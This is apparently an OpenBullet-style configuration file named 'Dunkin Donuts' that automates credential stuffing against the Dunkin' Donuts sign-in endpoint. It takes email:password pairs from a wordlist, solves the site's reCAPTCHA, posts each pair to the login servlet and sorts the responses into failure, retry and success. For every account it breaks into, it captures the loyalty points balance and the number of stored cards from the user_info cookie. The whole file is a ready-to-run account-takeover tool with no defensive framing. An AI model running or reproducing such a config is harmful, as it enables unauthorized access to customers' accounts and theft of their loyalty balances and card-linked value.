[SETTINGS]
{
  "Name": "Dunkin Donuts",
  "SuggestedBots": 10,
  "LastModified": "2018-05-05T17:28:37.7600424+00:00",
  "AdditionalInfo": "",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_MAIN_PAGE REQUEST GET "https://www.dunkindonuts.com/en/sign-in" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#CHECK_IF_ALLOWED KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Ban OR 
    KEY "You don't have permission to access" 
RECAPTCHA "https://www.dunkindonuts.com/en/sign-in" "6LdBZzcUAAAAAB-XtqPF8RiNX45TdtYYWtnHcSPF" -> VAR "RECAP" 
#LOGIN REQUEST POST "https://www.dunkindonuts.com/bin/servlet/signin" AutoRedirect=TRUE 
  CONTENT "service=signin&email=<USER>&password=<PASS>&g-recaptcha-response=<RECAP>&currentPageURL=%2Fcontent%2Fdd%2Fen%2Fsign-in" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "origin: https://www.dunkindonuts.com" 
  HEADER "referer: https://www.dunkindonuts.com/en/sign-in" 
  HEADER "x-requested-with: XMLHttpRequest" 
  HEADER "csrf-token: undefined" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Invalid password symbols!" 
    KEY "Sorry, the information you supplied does not match our records" 
  KEYCHAIN Retry OR 
    KEY "Bad Request." 
  KEYCHAIN Success OR 
    KEY "<COOKIES(*)>" Contains "\"{\\"firstName" 
#PARSE_COOKIE PARSE "<COOKIES(user_info)>" LR "" "" Recursive=FALSE -> VAR "COOKIE" "" "" 
#CAPTURE_POINTS PARSE "<COOKIE>" LR "" "" Recursive=FALSE -> CAP "Loyalty Points" "" "" 
#CAPTURE_N_OF_CARDS PARSE "<COOKIE>" LR "" "" Recursive=FALSE -> CAP "Num of Cards" "" "" 
